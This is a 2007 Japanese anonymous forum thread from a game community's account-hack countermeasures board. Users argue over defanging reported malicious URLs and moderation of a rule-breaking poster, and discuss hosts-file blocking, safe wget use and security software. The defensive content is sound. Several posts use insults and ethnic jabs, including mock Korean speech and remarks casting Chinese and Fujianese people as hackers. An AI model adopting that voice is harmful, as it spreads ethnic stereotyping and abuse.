(○口○*)さん<>sage<>07/11/14 16:50 ID:IN/V2MAQ0<> ハクスレ>906
混入しててもHDDを初期化すれば消える。
仮にこれを購入したとしても、増設した際にフォーマットすれば無害。
どちらかと言えば、以前あったUSBメモリに混入した事件の方が被害大きい気がする。 <>
(○口○*)さん<>sage<>07/11/14 19:53 ID:B8Aujnus0<> 誘導されとるし面白そうな話題だからぺたり
Seagate HDDに混入のウイルス、ネットゲームを標的に - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0711/14/news049.html
HDDもちゃいなふりー必須ですかこれは <>
(○口○*)さん<>sage<>07/11/14 20:35 ID:zif/CdMX0<> 嫌ですなぁ。
五輪開催に向けてのイメージ悪化阻止のための報道規制に躍起だとかって
話もあるし…イメージ維持じゃなくて、現状改善に尽くして欲しいわ。 <>
(○口○*)さん<>sage<>07/11/14 23:31 ID:NQOP0bpF0<> 外省人による諜報活動の線も疑われているしなあ。
ほんと分裂国家は地獄だぜ。
中国に拠点を移したロシアのハッカー集団が再び潜伏
ttp://www.computerworld.jp/news/sec/86689.html
XPでは最後になる、Service Pack 3
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20071112/286915/ <>
(○口○*)さん<>sage<>07/11/15 10:58 ID:TePcmqad0<> >総合スレ911
迷惑被る可能性があるのにピリオド残すのってどうよ。
1箇所しか置き換えないポリシーなら、wwwの後ろのピリオドを直した方がいいと思う。
その程度で発動させる環境なら、他のどっかで踏んでるだろうってのは同意だけどさ。
お互い気持ち良く掲示板使えた方が良くないかな。 <>
(○口○*)さん<>sage<>07/11/15 11:23 ID:SJONMWbJ0<> 嫌がってる人がいるのに尚もあの行為は、故意犯に他ならない <>
(○口○*)さん<>sage<>07/11/15 11:25 ID:V6Ofrl920<> >>530
自分が加害者になったらちゃんと責任とるって言ってるんだから
助言しても聞く耳を持たない相手は放っておいて良いだろう。 <>
(○口○*)さん<>sage<>07/11/15 11:28 ID:S9hfGePK0<> >ハクスレ911
どういうポリシーか理解できんのだが、それが俺のスタイル、と言うのもどうかと。
そもそも何のために報告してるんだ?
未然に被害を防ぐために、被害を拡大しないために、見つけたものを
報告してるんじゃないのか?
事故がおきたら元も子もないだろうに。
万が一あれで踏んだ人が出たら、中華の手先になったのと変わらん。
犯罪の一端を担った事になる、って理解してる? <>
(○口○*)さん<>sage<>07/11/15 11:28 ID:bjawIEgM0<> どう責任取るつもりなんだろうね
故意に踏んで責任取れ、って言われたらどうするつもりなんだろか <>
(○口○*)さん<>sage<>07/11/15 11:30 ID:hCNSuHkX0<> >>総合911
確かにそんな設定している人が直せってのは一理あるし確かだが、
「あ、垢ハックが危ないんだな。調べて私も対策おかないと」 という気持ちで初めて見に来た人が、
順番にスレをキッチリ見ていけば、 「あ、設定直しておかなきゃ」 って気付くかもしれない。
が、見事にまだその設定になっていた人がスレを読んでいる最中に、
運悪く事故的に間違えて誤クリックする可能性だってある。
(物が落ちてきて勝手にクリック、マウスのコード引っかかって机から落ちてクリック、ホイールの暴走など)
そういう可能性も考えて出来るだけ危険性を減らしていこうって言っているのになにがポリシーだ。
そんなものはただの我侭に過ぎない。そんなポリシーはさっさと捨ててくれ。
スレに情報見に来る人は初心者も居る訳で、全ての人が万全な体制でスレ見に来てる訳じゃない。
特に>>910へのアンカー後の発言はカッコつけながらケンカ売っているようにも見える。 <>
(○口○*)さん<>sage<>07/11/15 11:42 ID:xAir7CKv0<> >>アカハックスレ911
10の情報より1の安全を優先すべき事項だと思う。
だからそのくだらないポリシーを貫くというのなら、もう書き込まないでください。 <>
524<>sage<>07/11/15 12:31 ID:3fFV/SQIO<> 話の流れをぶった切りですが、524です。
昨日、ROをプレイした所、ノートンは何も反応せず、異常なしでした。
結局、何が原因かわかりませんが、アドバイスくれた方々、どうもありがとうございました!
またダメになるようなら、体験版などで乗り切っていきたいと思います。 <>
(○口○*)さん<>sage<>07/11/15 12:33 ID:CeWgHe220<> 接続者数スレの集計人と同じ匂いがするな
報告者は正義、だから俺は正義
だから好きにする、ってだけなら書いてもらわなくて結構 <>
(○口○*)さん<>sage<>07/11/15 12:37 ID:sNAdEG2Z0<> つーか故意にウィルスとわかってるURLを掲示板とかに貼ったりするだけで
電子計算機のナントカカントカの損壊のナンチャラカンチャラーみたいな感じで
法的にゴルァされる可能性あるんじゃなかったっけ? <>
(○口○*)さん<>sage<>07/11/15 13:02 ID:QjrcY9Um0<> 総合スレ>>911
いつも報告お疲れ様です。
私は>>910氏とは別人ですが、私もドットは全て■にして欲しいと思っています。出来るならhttpのhもカットしてほしい。
正直ありえない話ですが、もしいつか.comや.net無しでも該当URLに飛べるようになってしまったらどうされるお積りでしょうか。
怖いのは、どれだけ気をつけていても起こる「誤クリック」です。
これは油断して踏むという誤クリックではなく、
意識していても起こる誤ったマウス操作のことです。物理的・肉体的な。
現状では911氏の書き方で誤クリックしてしまっても危険なことはありません。
ですが誤クリックした人が不安に思い
「ここのスレのURLを踏んでしまった、表示されなかったようだが大丈夫だろうか」
と書き込む可能性だってあるのではないでしょうか。
そのような人達にも我々は「安心したいならリカバリーしろ」としか言えないのです。
いらぬ不安を撒き散らすことを「己のポリシーだから」という理由だけで行うのは
アカハック関係のスレッドには相応しくないと思いますよ。 <>
(○口○*)さん<>sage<>07/11/15 13:15 ID:3+l1Xrs+0<> >>533
報告してる俺カコイイってやつでしょ。
「被害を出さない・増やさない」って意識があるならあんなポリシー(笑)なんてスレに持ち込まない。 <>
(○口○*)さん<>sage<>07/11/15 13:23 ID:TrXWqa8x0<> Firefoxには勝手に.comとか.netに変換する機能があるよ
>>911の書き方じゃ誤クリックでウイルス仕込まれる可能性がある
機能をOFFにすることはできるけど
変換機能のことを知らなくて、
FireFoxでスレを見てて、
誤クリックする
っていう可能性だって十分ある
そんな危険性をできる限り減らそうってことで、ドットは全部■にしようってことになった
初めて来た人がそれを知らなくてURLそのまんま貼ってしまうことも時々あるけど
そのときは運営に報告してレスを消してもらってる
で、>>911はこれを知ってるかわからないけど、
レス読む限りだと911のレスからウイルス感染の可能性は自覚してるんだよね
それでなおポリシーだとかいうのなら来なくていい
むしろ考え方変えても来てもらわなくて結構 <>
(○口○*)さん<>sage<>07/11/15 13:27 ID:fMmSeoDW0<> 次やったらアク禁依頼でいいんでね? <>
(○口○*)さん<>sage<>07/11/15 13:28 ID:oePs0nFj0<> ポリシーよりもルールを優先させるのが日本人ニダ。 <>
(○口○*)さん<>sage<>07/11/15 13:52 ID:uk2YPJTu0<> 各自NGIDにぶち込めばよくね
あとは誰も触らなければ完全に視界から消える <>
(○口○*)さん<>sage<>07/11/15 13:55 ID:TePcmqad0<> でも、貴重な報告だし、危険な状態で貼った訳でもない。
「ごく一部の環境」では、補完されてしまって危険かもしれないというだけ。
テンプレにも、下記のように、警告が付されている。
>■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
意図せずに危険な状態になってしまう人がいるのだから、配慮しようというのが
過去に出た結論。そんなこたぁ知らん、自分で防げというのが投稿者のポリシー。
自分で防げ、大多数に取って危険ではないよう配慮しているってことは間違ってはないのだけれど、
もう少し配慮は払おうよって呼び掛けるに留めるのが第三者の立場としては妥当なんじゃないかな。
どうしても1箇所だけの置き換えに留めるなら、wwwの後ろなら、一部環境の人も危険ないだろうから
そっちで試してみて貰えると有難い。更に言うなら、まとめている人の負担にならない方法が最善かも。
>>543
アク禁依頼は既に出ているが、アク禁に値するとは思えない。 <>
(○口○*)さん<>sage<>07/11/15 13:56 ID:hCNSuHkX0<> IDは毎日変わるし、初心者は誰がNGとか判らんだろう。
初心者への配慮と言うのを忘れたら終わりだよ。 <>
(○口○*)さん<>sage<>07/11/15 14:05 ID:3+l1Xrs+0<> >>545
>>547の言うとおりで漏れらがNG登録しても意味がない。 <>
(○口○*)さん<>sage<>07/11/15 14:13 ID:WzWPwemC0<> よくFirefoxが引き合いに出されるけど、具体的にどのアドオンなん?
「機能がある」だけじゃ分からん。 <>
(○口○*)さん<>sage<>07/11/15 14:19 ID:mSU95txB0<> firefoxでは「デフォで」
アドレス欄に http://yahoo と入力すると 勝手に.comを補完して米Yahooを表示
という機能がついている。アドオン関係なし <>
(○口○*)さん<>sage<>07/11/15 14:21 ID:3+l1Xrs+0<> >>549が向こうのスレの過去ログを読んでいないことはわかった。 <>
(○口○*)さん<>sage<>07/11/15 14:25 ID:TePcmqad0<> こんだけ叩かれているのは
「セキュリティソフト入れない奴は意図せず加害者になることがあるのでやめれ」
というのと、感覚的に似てるからなんだろうな。
「意図せず危険に晒される人がいる」って辺りで、馬鹿、おまえ、やめろって意識になっちまう。 <>
(○口○*)さん<>sage<>07/11/15 14:29 ID:fvN3oeGb0<> ポリシー(笑)
垢箔を憎むあまり垢箔コピペと同じ所まで堕ちたか・・・ <>
(○口○*)さん<>sage<>07/11/15 14:35 ID:3+l1Xrs+0<> >>552
そうでなくて、
「垢箔被害を減らすために情報を集めよう」ってスレで被害がでかねない貼り方してるから
お前馬鹿だろっていわれてる。 <>
(○口○*)さん<>sage<>07/11/15 14:40 ID:hCNSuHkX0<> >>550
テンプレでFireFoxなどを進めているから余計に怖いな。
まずテンプレから見た人がFireFoxに乗り換えて誤クリック直撃なんて可能性もある。 <>
(○口○*)さん<>sage<>07/11/15 14:46 ID:TePcmqad0<> ところで、総合スレ900越えてるので話題に出すが、総合スレのテンプレちょっと直さないか?
今、垢ハック踏んだ場合の相談は総合スレ、一般的相談、垢ハックかわからないけど
何か踏んだ相談は、セキュスレとなっている。
踏んだ時は垢ハックかどうかわかってない訳だし、踏んだ時の相談は全部セキュスレに回して、
総合スレには、アカハックと確定したもののアドレスを転記したり、各種セキュリティソフトの
対応状況の報告とかだけにまとめちゃった方がすっきるすると思うのだがどうだろうか。
どうせ相談で回答する内容は、ブロックできたなら次は気をつけろ、不明ならOS入れなおせとだけ。
どっちに相談を出していいのか判らない人が悩まないで済む方が便利だと思う。
(MMOBBSのTOPも、総合スレではなく、セキュスレに変えられてたと思うし。 <>
(○口○*)さん<>sage<>07/11/15 15:50 ID:0pKvd+/e0<> >>546
しかし、個人のポリシーでスレのルールを無視すると言い切った人間はスレに居てもらわないほうが有益だと思うぜ
> 【投稿の際の注意】
> ・アカハックアドレスはMMOBBSでは禁止単語になっています。
> 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
> .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
3にはっきりと.(ドット)を置き換えて報告するように書いてるのにポリシーでそれは嫌だという
スレのルールも守れない奴はスレを利用する資格は無い
自分で防ぐ努力をするのは当然の事だが、他人を危険に晒さない努力をするのもあの場所では当然だろ <>
(○口○*)さん<>sage<>07/11/15 16:22 ID:B1rLoqsd0<> >>556
今のままでいい <>
(○口○*)さん<>sage<>07/11/15 16:25 ID:d/UBE1CD0<> >>556
何度か出た話題だけど、結局そのままになってるね。
「踏んだ後の相談」が総合スレ担当になっているのは
Ragnarok板にあるから、という理由だったと思う。
おそらく、踏んだ人があわてて相談にくるのはLiveROじゃなくて、Rag板の方。
>どうせ相談で回答する内容は、ブロックできたなら次は気をつけろ、
>不明ならOS入れなおせとだけ。
なのだから、いちいち誘導するよりは回答しちゃった方が早い。
相談する人が迷わないように、という配慮なら
いっそのこと踏んだ後の相談なら両方のスレでOKということにしてしまって
セキュスレに来た相談については
>総合スレには、アカハックと確定したもののアドレスを転記
することにすれば事足りるんじゃないかな。 <>
(○口○*)さん<>sage<>07/11/15 16:58 ID:3+l1Xrs+0<> 回答した方が早いのはそうなんだけど
踏んだ(かもしれない)人々の中の特にお馬鹿な連中が直前の文さえ読まず理解しない程度の質問を繰り返して
重要な情報を埋もれさせてしまうのを防ぐために
原則誘導をする結果になったと記憶しているが <>
(○口○*)さん<>sage<>07/11/15 17:13 ID:ABa3t3vH0<> アカウントハック総合対策スレ等にあるウイルスサイトのウイルスにはセキュリティソフト無効化するものや、
感染した状態のPCにセキュリティソフトインストールするのを阻止しようとするようなものもあるのでしょうか? <>
(○口○*)さん<>sage<>07/11/15 17:35 ID:TePcmqad0<> >>561
現時点で、アカハック(トロイ)で、そのような(ウイルスとしての)挙動をする事例は
報告されていませんが、今後もないとは言い切れません。 <>
(○口○*)さん<>sage<>07/11/15 17:36 ID:G1TvpSOp0<> 向こうでgdgdやってたのって、アンチGecko/w3c/OSS臭がするのは気のせい?
ABPに異を唱えてReferer弾きを始めたり、IE依存コードしか書けなくて食いっぱぐれを恐れているかと邪推したくもなる。 <>
(○口○*)さん<>sage<>07/11/15 17:37 ID:zZSHmzRr0<> 向こうのスレでスレルールも語れないのはどうかと思う。
一応姉妹スレとはいえ趣旨の違うスレなのにスレルールについてさえこっちに移動させられるなら、
いっそこのスレをRO板に移動させて、公知書き写すスレ突っ込むスレとか
愚痴スレ愚痴突っ込みスレ(こっちはいまいち割り切れてないけど)のように完全に2スレ制にしてしまえばいいじゃん。 <>
(○口○*)さん<>sage<>07/11/15 17:46 ID:d/UBE1CD0<> >>564
あの誘導してるのってなんか悪意を感じますよ。
削除された人かなにかが腹いせにやっているのであって、
スレ住人の総意ではないんじゃないでしょうか。 <>
(○口○*)さん<>sage<>07/11/15 17:55 ID:hCNSuHkX0<> こっちへの誘導は過剰すぎる時もあるね。
ただそうしていかないとグダグダになる可能性もあってなんとも。 <>
(○口○*)さん<>sage<>07/11/15 17:55 ID:Z4XhFcKD0<> >>564
スレルールはそのスレで話すのが常識というか、他でやる意味が分からんなw
こっちでやろうとするレスを逆に誘導してあげればいい。 <>
(○口○*)さん<>sage<>07/11/15 18:18 ID:TePcmqad0<> >>564
その2スレ制にした「雑談他」がここなんだけど。
Ro板でないといけない理由はないからこっちに立てられただけ。
あっちは、重要な情報が埋もれないようにするのが優先。
今回は、まとめの人が、アドレス捕捉できてたからいいようなものの、削除依頼出すなら出すで、
問題無い形にアドレスを書き直して投稿してからにして欲しいもんだ。情報が消えてしまうことの方が、
ごく一部の環境でのみ問題があるかもしれないことを危険視するより重要だと思ったのは俺だけか? <>
(○口○*)さん<>sage<>07/11/15 18:25 ID:f+tnn4xz0<> わかってるなら、あなたがその主張どおりにフォローすればいいだけの話 <>
(○口○*)さん<>sage<>07/11/15 18:29 ID:QjrcY9Um0<> >>568
同意。
住民が増えたのか変わったのかわからないけど
元々2スレにわけたのは、重要な情報が埋もれないようにする為。
通常のスレッドではスレルールやテンプレについてそのスレで話すものだけど
アカハックスレは別物と思うべき。アカハックスレの誘導は過剰なぐらいで丁度いいと思うよ。 <>
(○口○*)さん<>sage<>07/11/15 18:29 ID:Z4XhFcKD0<> スレルール変えたいならそれが最重要だろう。
「重要な情報が埋もr」の重要の情報とは何かを決めるのがスレルールなのだから。 <>
(○口○*)さん<>sage<>07/11/15 18:39 ID:TePcmqad0<> >>571
だから、スレルールを決める話題は、こっちで話すように分離されてるんだってば。 <>
(○口○*)さん<>sage<>07/11/15 18:39 ID:0pKvd+/e0<> 削除依頼スレに消さないように書き込んでる奴が居るが、あの主張はちょっと筋違いじゃね?
一部の人間だけでも感染してしまう可能性があるから消すほうが良いと管理者が判断したから削除されたんだろう
それに対して情報がなくなるから管理者にフォローしてくれって言うのはどうよ?
スレの住人がフォローして行くべき事を管理者に言うなんて恥ずかしいにも程があるぜ
再投稿してくれれば消しても良いとか注文つける前に自分たちで出来る事をやろうぜ <>
(○口○*)さん<>sage<>07/11/15 18:42 ID:zZSHmzRr0<> LiveROに立った理由は単に面倒で是非を問うスレを回避しただけじゃないの?
RO板にある必要は無いって、このままLiveROで続ける意味もないでしょ。
俺が特に言いたいのは「完全に」の部分。
むしろこのスレをRO板に移せば、上で言われたRO板に有ることで向こうに質問者が流れ着くという問題の解決にもなる。
自治レスもできないスレなら、情報を埋もれさせるなというなら、危険アドレスの投稿のみでそれに対する乙すら禁止しちまえと。 <>
(○口○*)さん<>sage<>07/11/15 18:49 ID:3+l1Xrs+0<> >>573
見てきた。
筋違い以前にやってることが違い過ぎる。
あんな長文書くくらいなら情報をまとめて書きこんでおけばいいのにネ。 <>
(○口○*)さん<>sage<>07/11/15 18:58 ID:Z4XhFcKD0<> >>572
いつ決まったんだよw
そろそろ他スレ荒らすの止めてください>< <>
(○口○*)さん<>sage<>07/11/15 19:25 ID:G1TvpSOp0<> このスレが分離した理由のうち一つに、RO板のスレ立て遅延があったかと。
爆撃の爆発的流行があったタイミングで、受け皿スレが無いのも問題になり得るから。
現状では、新規★持ちも増えて緩和されたとはいえ、転ばぬ先の杖的存在は必要ではないかと。 <>
(○口○*)さん<>sage<>07/11/15 19:34 ID:qU/exE2R0<> >>572
アカウントハック総合対策スレの>>1は
>アカウントハックに関する情報の集積・分析を目的とするスレです。
>被害や攻撃等のアカウントハックの具体的事例に関して扱います。
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。
スレの骨子を検討するのは雑談じゃないと思うんだが
検討から雑談にそれるなってことだけ
杓子定規に考えると、不便と混乱をもたらすだけだぞ
まあ、すぐ移動しろって言われるから過敏になる気持ちは分かるけど <>
(○口○*)さん<>sage<>07/11/15 19:55 ID:qU/exE2R0<> あとついでに削除依頼スレの886
>危険であると言われているのは、「特定のブラウザ」で、「意図的にクリック」した場合に
>補完されて、危険アドレスに飛んでしまう可能性であり、大多数の環境では問題が
>出ない形には留意されています。
>>540でもあるが、
>意識していても起こる誤ったマウス操作のことです。物理的・肉体的な。
もある以上、特定のブラウザだろうが無意識だろうが、
とんでいってしまう可能性も考慮しなければならない
蛇足な上に私感だが、ドットを置き換えろというのは、直リンクが危険という以外にも、
危険かもしれないアドレス、というのをぱっと見て認識できる、というのもある
ttp://enif.mmobbs.com/test/read.cgi/livero/1186660300/
ttp://enif■mmobbs■com/test/read.cgi/livero/1186660300/
ここのスレだが、下の方が直感的に気を引かない?(´・ω・`)
>該当スレのテンプレにもきちんと警告が行われています。
書いたから許されるものではない
毒入り飲むな、と書いてあれば乳幼児が飲まないとかコップに注ぎ直しても飲まないとか
そんな訳はない
>問題のない形で再投稿した上で削除するのならわかりますが、せっかくの危険情報を
>(まとめられた一部分以外も問答無用で)削除してしまうことは勿体無いです。
>重要な情報を問答無用で消してしまうのは良くないことだと思います。
管理人にそこまで作業させる権限は我々にはないし、管理人がする義務も道理もない
重要だろうが重要でなかろうが、ルール違反はルール違反
管理人で削除の上、住人が正しいフォーマットで上げ直せばいいだけ
このスレだけじゃなくて、「なぜ危険か」「どうすれば危険でなくなるのか」
というのを考えないセキュリティ対策は、「つもり対策」でしかない <>
(○口○*)さん<>sage<>07/11/15 20:25 ID:PWVcfwgt0<> プニルでコピったら飛んじゃった <>
(○口○*)さん<>sage<>07/11/15 20:39 ID:TePcmqad0<> >>579
>ルール違反はルール違反
なんか、勘違いしているようだが、置き換えは推奨であって、強制ではないよ。
相談者がスレのルール知らずに置き換えずに書き込むケースもあって
(その時は自分で直して再投稿の上、削除依頼までしにいってたけど)
置き換えないことは削除理由にはならない。
削除依頼が、危険URLを誰かが踏みかねない状態で置いた書き込みだというものだったので
垢ハックをやってる業者が危険URLを貼っていった時と同じ対応をされただけ。
本来は削除対象になるかは疑問だと思っている。
今回こっちで散々叩かれているのは、踏んでしまいかねない人がいるのに、配慮する気が
ないって言い切ったからだと思っているぞ。
>管理人で削除の上、住人が正しいフォーマットで上げ直せばいいだけ
わたしもそう思うよ。ただ手順としては逆かな。
置き換えたものが先に消えてしまうと住人が上げなおす元がない。当人は、再投稿するつもりは
ないんだろうし、住人が「上げなおした後で」削除依頼に行くべきだと考えている。
今回、その手間をかけないで、削除依頼だけが行われたのは問題視すべきじゃないかな。 <>
(○口○*)さん<>sage<>07/11/15 22:37 ID:Yl13ZI//0<> >.(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
>【 アドレス 】 (ドット(.)を■等で置き換える事。h抜き等は駄目)
"代替文字を■とすること" が推奨に過ぎないだけで、ドットを置き換えるのはテンプレにも明記されたスレルールだよ。
テンプレってのはそれこそスレ全体のポリシー(原則・方針)なのであって
個人的なポリシー(くだらない信条)で捻じ曲げられたら他の利用者が困る。
何度言っても聞く耳持たず、スレルールを無視し続けるのなら置き換えないこと自体も削除対象。
これはハッキングスレに限ったことではない。
そっちこそ勘違いしてるようだけどルールから外れてしまうことが問題なのではなく、ルールを無視し続けることが問題なわけ。
だからルール知らずに、とか知ってたけどうっかり、とかいうのは多分叩かれるけどまったくの別問題。
ましてセキュリティスレで少しでも安全性を上げようと工夫してテンプレ決めたのに
わざと安全性を下げる行為、下手すりゃハッキングの助長ともなりえる行為を繰り返すなど論外。
だからアク禁をとなえるものまで現れるの。
>削除依頼が、危険URLを誰かが踏みかねない状態で置いた書き込みだというものだったので
>垢ハックをやってる業者が危険URLを貼っていった時と同じ対応をされただけ。
まさにそのとおりだよ。
故意不意関係なく管理サイドとしては削除する以外にないでしょ。
現実にワンクリックアウトの可能性があるのに何を疑問に感じてるのか知らないけど、
あんたが管理者だったら「これは疑問だから」と依頼の仕方によっては放置するの?
それで踏むやついたらどうすんの?
ハッキングスレに危険URLとして示したはずなのに・・・それが「つもり対策」になっちゃうんだよ。
最後の三行だけは理想として、今後の課題として、完全に同意するけど、ほかはおかしい。 <>
(○口○*)さん<>sage<>07/11/16 01:18 ID:EV1hwFOK0<> まだ管理板で暴れてるバカが要るな
スレの住人の削除依頼を受けて管理人が削除した。
削除されて情報整理が出来なかったとかあほな事抜かす位なら、
情報整理をする前に削除依頼出したことを問題視しなくちゃいけないのにそんな理屈も分からないんだろうかね <>
(○口○*)さん<>sage<>07/11/16 01:23 ID:4CMti0S+0<> 馬鹿なんだから判らないだろ <>
(○口○*)さん<>sage<>07/11/16 01:46 ID:YEYbJPsz0<> あそこまで自分ルール全開のキチガイは久しいな… <>
(○口○*)さん<>sage<>07/11/16 02:22 ID:3141HKdl0<> 今まで
置き換え1箇所で投稿→h削ったり、もう1箇所の.も■にして欲しいと書き込まれて終了
削除しなければならないとの意思表示は今までなかった
今回
置き換え1箇所で投稿(ポリシー主張)→"反発して"削除依頼→削除
削除されたのを受けて、過去に遡って(そのまま活用された情報を)削除要請→待ったがかかる
一番叩かれなきゃならないのは、考えなしの削除依頼だと思う。
危険URL報告してくれた人のポリシー主張にも問題あるけど。
>現実にワンクリックアウトの可能性があるのに何を疑問に感じてるのか知らないけど、
自己責任の範疇がどこまでかって意識の問題だよね。
今回問題なのは、
1.特定ブラウザで(不注意か過失があった場合に)危険があることを知っていて
置き換えを1箇所しかしなかった投稿者。
2.情報が失われることの害を一切考慮せず、早漏削除依頼した人。
ポリシーとやらに異論あっても、情報を遺失させていい理由にはならない。
今回の件のこの後の対応
a.過去の投稿に遡って削除依頼をする為に、必要な箇所を住人が書き換えて再投稿した上で
削除依頼スレに依頼にいく。
b.自己責任の範疇でもあり、過去のことなので、無理に遡って措置はしない。
過去の投稿時には注意してね程度であり、削除要請すべきであるとの声は挙がっていなかった。
但し、運営側に削除の意向があれば、a.の措置をしないといけない。運営側の判断待ち。
今後の対応
1.まず、スレ住人が、問題のない書式に書き換えて再投稿する
2.問題のある書式の投稿について削除依頼する <>
(○口○*)さん<>sage<>07/11/16 03:54 ID:EV1hwFOK0<> 向こうで暴れてる本人だな
勘違いしてるが管理人の判断待ちなんて必要が一切無い
必要な情報だけ絶対に削除されないような形で退避しておけばそれで済む話
消されなかったとしても情報は失われないんだから、重複しても何の問題もないだろうが
そもそも今回の件に関しても個人の自分勝手なポリシーに反発したから削除依頼を出された訳じゃない
>>540から読み直せ <>
(○口○*)さん<>sage<>07/11/16 04:25 ID:T7hDl9Qh0<> >>586
1行でいうと、「誤クリックの恐れがあるから、削除以来をした」 <>
(○口○*)さん<>sage<>07/11/16 08:34 ID:3141HKdl0<> >>588
それは自己責任の範疇
なんて、言ってても仕方ないのでこんなのをペタリ。
Windows XP標準添付のサードパーティ製ドライバの脆弱性を塞ぐ
http://internet.watch.impress.co.jp/cda/special/2007/11/15/17534.html <>
(○口○*)さん<>sage<>07/11/16 09:23 ID:5Y74FUQs0<> トラブルになるだけだし、スレルールに
・貼り付ける場合は http:// は外し、ドメイン名の「.」は全て「■」に置換する
こう明記しておけば済む話じゃないか?
ついでに誰も張ってなかったので、サルベージしたやつを貼っておいた。
検体拾えないという理由なら、これで収まるはず。 <>
(○口○*)さん<>sage<>07/11/16 10:57 ID:iXlYoKLx0<> >>589
画鋲を撒いておいて踏んだらそいつのせいってことか? <>
(○口○*)さん<>sage<>07/11/16 11:54 ID:hSoQR8CV0<> 垢ハックを防ぐスレで危険性を出されて自己責任なんて言ってる時点で配慮がなってない。 <>
(○口○*)さん<>sage<>07/11/16 12:49 ID:EV1hwFOK0<> >>589
それは垢ハクへの直リンをそのまま加工せずに張っても同じことが言えるな
クリックしたのは自己責任だもんな
お前さんがやった事、言ってる事はそういうレベルの話
情報とかそんなのは関係なく、一部の人間にとってはお前さんは垢ハクへの直リンを貼り付ける業者と一緒 <>
(○口○*)さん<>sage<>07/11/16 13:46 ID:Lq9JrwOG0<> 管理人が削除したことにより結論は出ている。
削除措置に納得がいかないなら管理板へ。
これ以上gdgd続けたいなら議論スレへでもいってくれ。 <>
(○口○*)さん<>sage<>07/11/16 14:32 ID:baZju0lZ0<> 管理板で既に散々暴れてるっぽいから議論スレ一択だな <>
(○口○*)さん<>sage<>07/11/16 15:32 ID:3141HKdl0<> 解決したことをこれ以上語る必要ないだろ。
テンプレの改定箇所の話にもどろうぜ。
>>590の採用の他に、(h抜き+■でいいような気がするけど)なんかある?
|・貼り付ける場合は http:// は外し、ドメイン名の「.」は全て「■」に置換して下さい。
相談関係のルールは、こんな感じでいいのかな。(文面はこれから考えるとして)
|アカハック踏んだ時の相談は基本セキュスレだけど、総合スレでも対応する。
|アカハック以外の相談が総合スレに書かれたらセキュスレに誘導する。 <>
(○口○*)さん<>sage<>07/11/16 19:11 ID:11j8Kafm0<> 最近まとめサイト向けのhost追加分をまとめている中の人です。
すこし流れをぶった切って質問させていただきます。
今の今まで、hostファイルのローカルへ返す記述で
"127.0.0.1 10進表記IP"と10進の分も追加していたのですが
この部分に関しては制限が本当に適用されているのでしょうか?
していなかったら、利用している方々に本当に申し訳なく・・。
と、いうのはバスターの不審ソフトウェア警戒システムやら
WindowsDefenderではhostの変更に対して反応はするのですが
先ごろバスター側でこの10進表記の追加変更に対して反応がされなかったので
不審に思い、試しに自分のhostファイルを下記のような感じで実験してみた所、
ローカルホストに戻すような動作していなかった為です。
(IP部分のコメント#は実際は消してあります。)
#実験 10進表記動作チェック Yahooをローカルに返す。googleをLivedoorへ転送?
#127.0.0.1 203.216.227.176←ヤフーを127.0.0.1に返す
#203.131.197.197 72.14.207.104←左:ライブドア 右:ぐぐる
今まで纏めていて、本当にこんな事を聞くのは失礼だとおもったのですが
調べ方が悪い為にhostファイルの10進表記に対しての制限についての記述がどうしても見つけられなかったので
ここで解る方々に非難を受けるのを承知ですが、是非ご教授して頂きたく思います。 <>
(○口○*)さん<>sage<>07/11/16 19:33 ID:NxWbyjPE0<> 普通に考えたらhostsは見ない。 <>
(○口○*)さん<>sage<>07/11/16 22:13 ID:PAH0ZtzR0<> >>588
簡潔に言われているんで分かりにくいかもだが589の言う通り。
hostsファイルは『ホスト名をIPに変換する為のリスト』。アプリがリクエストした先が
IPだったらば別にそのままアクセスすれば良いんだからhostsファイルなんて参照する
必要は無い訳。なので、そうなる。
ちなみにロングナンバーIP等もホスト名ではなくIPなのでhostsファイルではどうこうできない。
それに
127.0.0.1 example.com
とやっても、www.example.comにはアクセス出来るのはご存知の通り。hostsファイルで
出来る事なんて結構タカが知れているので、FWで何とかするのが真っ当な解法だと思うよ。 <>
597<>sage<>07/11/16 23:15 ID:tlgmIPz50<> >>598-599
ありがとうございます。
今までその点が理解できていなかった事が恥ずかしいです。
追加分のそういった記述の部分を知る意味でも、お聞きした甲斐がありました。
IPの部分に関してはFWで対応できる可能性があると言うことで、
以前の分も含めて、この情報が判っている部分は
コメント行で併記して記述しておこうと思います。 <>
(○口○*)さん<>sage<>07/11/17 05:29 ID:RrLivfn90<> あくまで、hosts変更での対策は小手先レベルであり、サービスプロセスで動くようなマルウェアがロックするような事態になれば、
既にこの程度では手に負えなくなる。
それに加えて、dns全盛の今、敢えて旧世代的ロジックを用いている事も念頭に置いておかないと、足元を掬われかねない。
以下、蛇足かもしれない部分。
HostsRenewスクリプトの、次期バージョンでは、wgetのオプションに、--no-host-lookupも追加した方が良いかも。
仮に、取得先アドレスを含む改竄が行われていた場合に、罠入りHostsを更に飲まされる可能性が減るかも。
ttp://d.hatena.ne.jp/cloned/20061006
>wget --no-host-lookup <>
(○口○*)さん<>sage<>07/11/17 21:21 ID:HdzhkAe30<> 福建人が取得したライブドアの罠ID群
ざっと拾ってみた。
これでも氷山の一角なんだろうな、まだ増えるだろうし。
xoveryelper
sillboo
mvuu
xihuuch
monlognh
xikkhh
meer_gurni
bsskkb528
mmo88
zb00999
bubudsg9985
kohh00
gvb55
ztylove888
bbhh55
mk5254
lsson
juwwq
uuoo
ggi8845
vvn1258
moo12
moonshddow56
ciihhuu425
dor56
cch225
baby_babr_baby_music (乗っ取り) <>
(○口○*)さん<>sage<>07/11/18 11:28 ID:hYTnTjTe0<> なんかもう住民基本台帳番号を強制してネット関連は入力必須にして欲しいくらいだな
アニメやらMP3の違法うpとかも減るだろうし <>
(○口○*)さん<>sage<>07/11/18 13:28 ID:4sJOWu780<> カスペ7.0を導入しようと思うんだけど、PG2も合わせて
入れとくべき?同時に入れて競合しないか疑問なのですが。
FWソフトはアプリケーション単位でのブロック、PG2は
IP指定でのブロックだから大丈夫なのかな? <>
(○口○*)さん<>sage<>07/11/18 13:41 ID:O35iV9Lw0<> >>604
競合しません。可能なら両方いれておきましょう。 <>
